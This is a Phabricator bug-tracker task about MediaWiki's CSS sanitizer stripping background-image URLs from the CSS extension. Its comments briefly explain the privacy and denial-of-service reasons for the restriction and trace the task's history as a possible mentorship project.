Page MenuHomePhabricator
Create Task
Maniphest T37820

[CSS] Some CSS stripped by MediaWiki parser CSS sanitizer
Open, LowestPublic
Actions

Description

I have been unable to get background-image:url( someURL ) to work with this extension, like below:

{{#css:
	/*
		This code requires the CSS extension (previously used NewPageCSS)
		http://www.mediawiki.org/wiki/Extension:CSS
	*/

	.someClass { background-image:url(http://www.somedomain.com/w/images/0/06/someimage.png); }
}}

I believe it is due to Sanitizer::checkCss() as described by Brion here:

http://www.gossamer-threads.com/lists/wiki/mediawiki/233179

The CSS that gets sanitized by the parser is getting stripped out of the CSS extension too.

However, the usual /* insecure input */ error message appears in the <head> of the page source, like this:

<style type="text/css">
/*<![CDATA[*/
/* insecure input */
/*]]>*/
</style>

The only way to get around this problem is to put the CSS in MediaWiki:Common.css.

There are good reasons for the parser to strip some CSS out, but in addition to documenting this issue (which this bug does, and I'll do in the extension docs in a moment), it should be configurable whether the CSS extension lets the parser sanitize, for example, when used on private wikis.

Details

Reference
bz35820

Related Objects

Event Timeline

bzimport raised the priority of this task from to Medium.Nov 22 2014, 12:18 AM
bzimport added a project: MediaWiki-extensions-CSS.
bzimport set Reference to bz35820.
bzimport added a subscriber: Unknown Object (MLST).
Badon created this task.Apr 8 2012, 9:49 PM
Qgil added a comment.Mar 25 2013, 2:40 AM

There is a proposal to improve Extension:CSS at

http://www.mediawiki.org/wiki/Mentorship_programs/Possible_projects#Improve_Extension:CSS

Pasting the part related with security to get more feedback:

"The CSS extension relies on basic blacklisting functionality in MediaWiki core to prevent XSS. It would be great if a proper CSS parser [1] was integrated and a set of whitelists implemented to offer various levels of capability/protection trade-offs.

For example, some wikis may want all CSS selectors prefixed with "#mw-content-text" and properties like "position", etc. disabled to limit the effect of styles to the article content. Other sites may want everything except XSS-able properties/values."

[1] https://github.com/sabberworm/PHP-CSS-Parser

Qgil added a comment.Oct 31 2013, 5:22 AM

This project proposal is now featured at https://www.mediawiki.org/wiki/Outreach_Program_for_Women/Round_7

csteipp added a comment.Oct 31 2013, 4:17 PM

(In reply to comment #1)

"The CSS extension relies on basic blacklisting functionality in MediaWiki
core
to prevent XSS. It would be great if a proper CSS parser [1] was integrated
and
a set of whitelists implemented to offer various levels of
capability/protection trade-offs.

This sounds like a great project. I'd recommend looking at HTML Purifier's CSS rules as well, which would be great to integrate into either the extension, or core's CSS sanitization.

[1] https://github.com/sabberworm/PHP-CSS-Parser

Bawolff added a comment.Dec 13 2013, 11:36 PM

There are good reasons for the parser to strip some CSS out, but in addition
to
documenting this issue (which this bug does, and I'll do in the extension
docs
in a moment), it should be configurable whether the CSS extension lets the
parser sanitize, for example, when used on private wikis.

The reason sanitizer doesn't let that through, is we don't want people to be able to load external resources from inline css
*This could in theory be used as a DOS attack against somebody else if someone put it on a popular page.
*It can be used to track users, and associate usernames with ip addresses (i.e. have {{REVISIONUSER}} in the query string of the external resource.

(There could be other resons. Those two are just the two I know about)

MZMcBride added a comment.Dec 14 2013, 6:25 AM

Bug 57891 is not an appropriate "see also"; removing.

Qgil added a comment.Sep 12 2014, 9:19 AM

A new round of FOSS OPW is coming. Should we keep https://www.mediawiki.org/wiki/Mentorship_programs/Possible_projects#Allowing_3rd_party_wiki_editors_to_run_more_CSS_features as a featured project? Meaning, does this project still make sense and are there mentors still available?

Qgil added a project: Possible-Tech-Projects.Feb 10 2015, 2:50 PM
Qgil added a comment.Feb 11 2015, 1:44 PM

Wikimedia will apply to Google Summer of Code and Outreachy on Tuesday, February 17. If you want this task to become a featured project idea, please follow these instructions.

Qgil lowered the priority of this task from Medium to Lowest.Feb 16 2015, 11:45 PM
Niharika moved this task from Backlog to Re-check in September 2015 on the Possible-Tech-Projects board.Mar 6 2015, 4:59 AM
Qgil added a comment.Sep 23 2015, 9:10 AM

This is a message posted to all tasks under "Re-check in September 2015" at Possible-Tech-Projects. Outreachy-Round-11 is around the corner. If you want to propose this task as a featured project idea, we need a clear plan with community support, and two mentors willing to support it.

Restricted Application added a subscriber: Aklapper. · View Herald TranscriptSep 23 2015, 9:10 AM
Qgil added a comment.Sep 23 2015, 9:36 AM

This is a message sent to all Possible-Tech-Projects. The new round of Wikimedia Individual Engagement Grants is open until 29 Sep. For the first time, technical projects are within scope, thanks to the feedback received at Wikimania 2015, before, and after (T105414). If someone is interested in obtaining funds to push this task, this might be a good way.

TasneemLo subscribed.Oct 6 2015, 3:44 AM

This seems to be an old task with no inputs since 2 years.
Is this still valid ? Is there demand for this ?

TasneemLo moved this task from Re-check in September 2015 to Need Discussion on the Possible-Tech-Projects board.Oct 6 2015, 3:44 AM
Shrutika719 subscribed.Oct 8 2015, 3:16 PM
Qgil removed a project: Possible-Tech-Projects.Oct 11 2015, 9:03 PM
Qgil set Security to None.

Maybe the initial task is still valid, but I agree that no real movement in years doesn't make it an ideal candidate for Possible-Tech-Projects. If mentors related to MediaWiki-extensions-CSS want to bring it back, they are are welcome.

TasneemLo unsubscribed.Dec 20 2015, 9:13 AM
Izno updated the task description. (Show Details)May 5 2019, 12:23 PM
Izno removed a subscriber: wikibugs-l-list.
Restricted Application added a subscriber: Liuxinyu970226. · View Herald TranscriptMay 5 2019, 12:23 PM
ahmad subscribed.Mar 16 2020, 4:44 PM
Kizule mentioned this in T300704: Enable unsanitized CSS namespaces.Feb 2 2022, 8:15 AM
Content licensed under Creative Commons Attribution-ShareAlike (CC BY-SA) 4.0 unless otherwise noted; code licensed under GNU General Public License (GPL) 2.0 or later and other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL